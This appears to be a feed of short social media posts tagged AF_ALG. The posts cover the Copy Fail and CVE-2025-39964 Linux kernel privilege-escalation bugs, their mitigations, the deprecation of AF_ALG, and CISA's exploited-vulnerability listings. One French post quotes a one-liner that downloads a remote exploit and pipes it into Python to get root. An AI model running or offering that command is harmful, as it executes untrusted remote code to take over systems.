#AF_ALG
GrapheneOS is immune to the Copy Fail vulnerability due to the deep integration of SELinux in the Android Open Source Project (AOSP). AOSP only permits using specific types of sockets throughout the OS. It only permits the dumpstate process used to create bug report zips to access AF_ALG sockets.
April 30, 2026 at 2:34 AM
Old Linux bug lets local user gain root & break out of container via AF_ALG CVE. #Linux #KernelSecurity #CVE2025-39964 #ContainerEscape #AF_ALG #PrivilegeEscalation thedailytechfeed.com/14-year-old-...
September 25, 2026 at 6:26 PM
Here's where Android defines a neverallow for many types of sockets including AF_ALG for regular sandboxed apps:

android.googlesource.com/platform/sys...

Android has a versioned app sandbox which gets stricter for new API levels. The versioned domains inherit from that untrusted_app_all domain.
private/app_neverallows.te - platform/system/sepolicy - Git at Google
android.googlesource.com
April 30, 2026 at 2:58 AM
Learn why Linux Kernel developers want to deprecate AF_ALG features, and the security concerns driving the decision.

Full story here: ostechnix.com/linux-kernel...

#AF_ALG #LinuxCryptoSubsystem #Linuxkernel #Linuxsecurity #EricBiggers #LinuxkernelHardening #Opensource
Linux Kernel Developers Move to Deprecate AF_ALG to Reduce Attack Surface - OSTechNix
Learn why Linux Kernel developers want to deprecate AF_ALG features, and the security concerns driving the decision.
ostechnix.com
June 2, 2026 at 2:03 PM
Copy Fail? Also looks like memory safety, but is actually complexity.

xint.io/blog/copy-fa...

I am going to link to this while rejecting changes to Go crypto for years.

Anyway, feeling pretty validated in my "ssh in as root, only gVisor or Firecracker are an actual security boundary" approach.
April 29, 2026 at 10:54 PM
AF_ALG Deprecation Approved For Linux 7.2, Useless & Insecure Crypto Driver Code Removed - https://www.phoronix.com/news/Linux-7.2-Crypto
AF_ALG Deprecation Approved For Linux 7.2, Useless & Insecure Crypto Driver Code Removed
The cryptographic subsystem updates have been merged for the ongoing Linux 7.2 kernel merge window...
www.phoronix.com
June 18, 2026 at 1:50 PM
Codize Sandbox v0.11.0 リリース
Copy Fail (CVE-2026-31431) 対策として AF_ALG ふさいどいた
github.com/codize-dev/s...
Release v0.11.0 · codize-dev/sandbox
0.11.0 (2026-04-30) Features block AF_ALG sockets via seccomp (3d024ab)
github.com
April 30, 2026 at 12:13 PM
🤖 CISA: 3 Linux kernel flaws actively exploited (1 critical), added to KEV. CVE-2025-39682 (kTLS, public exploits), CVE-2025-39964 (AF_ALG race), CVE-2026-53266 (ebtables OOB…
September 22, 2026 at 4:42 AM
ça ça pique...

curl copy.fail/exp | python3 && su

Pour passer root sur n'importe quelle distro depuis 2017 ...

copy.fail
Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. - Xint
Xint Code disclosed CVE-2026-31431, an authencesn scratch-write bug chaining AF_ALG + splice() into a 4-byte page cache write. A 732-byte PoC gets root on Ubuntu, Amazon Linux, RHEL, SUSE. | AI for Se...
copy.fail
April 30, 2026 at 2:39 PM
"GrapheneOS is immune to the Copy Fail vulnerability due to the deep integration of SELinux in the Android Open Source Project (AOSP). AOSP only permits using specific types of sockets throughout the OS. It only permits the dumpstate process used to create bug report zips to access AF_ALG sockets."
April 30, 2026 at 11:10 PM
Three exploited Linux kernel flaws, three different exposure paths. Map kTLS, ebtables SNAT and AF_ALG first; patch, verify the running kernel, then investigate.

https://acetrum.com?utm_source=bluesky&utm_medium=social
September 22, 2026 at 5:16 AM
Linux on the desktop they said.

It'll be better than that insecure windows os, they said...

1000s of eyes in Open source exposes vulns early, they said...

copy.fail
May 3, 2026 at 6:08 PM
🛑 CVE-2025-39964
Linux Kernel
CVSS 7.8 / EPSS 0% / KEV: No
TL;DR: In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Disallow …
https://cvesentinel.com/report/CVE-2025-39964?utm_source=bluesky&utm_medium=social&utm_campaign=cvesentinel
#infosec #CVE #vulnerability
September 18, 2026 at 2:28 PM
CVE-2026-31431 (Copy Fail): a Linux kernel vulnerability. Docker Engine prior to v29.4.3 allowed containers to create AF_ALG sockets by default. That is the syscall surface the exploit uses. Fix: upgrade to Docker Engine v29.4.3+, or patch the host kernel.
June 2, 2026 at 1:05 PM
📰 CISA confirma exploração activa de três falhas do kernel Linux

A CISA acrescentou a 18 de setembro três vulnerabilidades do kernel Linux ao catálogo...

CISA confirma exploração activa de três falhas do kernel Linux
A CISA acrescentou a 18 de setembro três vulnerabilidades do kernel Linux ao catálogo de falhas com exploração confirmada. Duas já têm correcção dos fornecedores; para a do AF_ALG a Red Hat diz não haver patch nem mitigação. O prazo de 21 de setembro...
tech.neural-rage.com
September 21, 2026 at 9:32 PM
(CISA TS+SOC) The Cyber Mind TSUITE Brief: CVE-2025-39964 – Linux Kernel Race Condition Vulnerability

Analyze the mechanics of CVE-2025-39964 with our technical Linux TSUITE brief, covering AF_ALG race conditions, CrowdStrike CQL queries, and endpoint hardening....

https://thecybermind.co/dxag
(CISA TS+SOC) The Cyber Mind TSUITE Brief: CVE-2025-39964 – Linux Kernel Race Condition Vulnerability
Analyze the mechanics of CVE-2025-39964 with our technical Linux TSUITE brief, covering AF_ALG race conditions, CrowdStrike CQL queries, and endpoint hardening.
thecybermind.co
September 21, 2026 at 12:03 PM
Copy.Fail Linux Vulnerability

This is the worst Linux vulnerability in years. TL;DR copy.fail is a Linux kernel local privilege escalation, not a browser or clipboard attack. Disclosed by Theori on 29 April 2026 with a working PoC. It abuses the kernel crypto API (AF_ALG sockets) plus splice() to…
Copy.Fail Linux Vulnerability
This is the worst Linux vulnerability in years. TL;DR copy.fail is a Linux kernel local privilege escalation, not a browser or clipboard attack. Disclosed by Theori on 29 April 2026 with a working PoC. It abuses the kernel crypto API (AF_ALG sockets) plus splice() to write four bytes at a time straight into the page cache of a file the attacker does not own.
www.schneier.com
May 12, 2026 at 11:07 AM